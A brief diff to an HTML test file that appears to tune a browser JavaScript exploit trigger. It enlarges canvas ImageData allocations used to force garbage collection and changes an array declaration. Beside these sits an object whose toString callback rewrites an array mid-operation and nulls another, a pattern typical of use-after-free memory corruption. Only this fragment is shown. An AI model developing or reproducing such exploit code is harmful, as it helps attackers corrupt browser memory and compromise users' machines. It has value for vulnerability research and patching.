--- a/test1.html
+++ b/test1.html
@@ -6,7 +6,7 @@ function gc() {
         var gl = c.getContext("2d");
 
         for (var i = 0; i < 4; i++) {
-            var gggg = gl.createImageData(1, 0x10000)
+            var gggg = gl.createImageData(1, 0x100000)
         }
     } catch (e) {
 
@@ -17,7 +17,7 @@ function sleep(d){
 }
 
 var c = new Array(0x10000)
-var b = new Array();
+var b = new Array(1,2,3);
 var a = [1,{toString:function(){
  a[2] = {};
  b = null
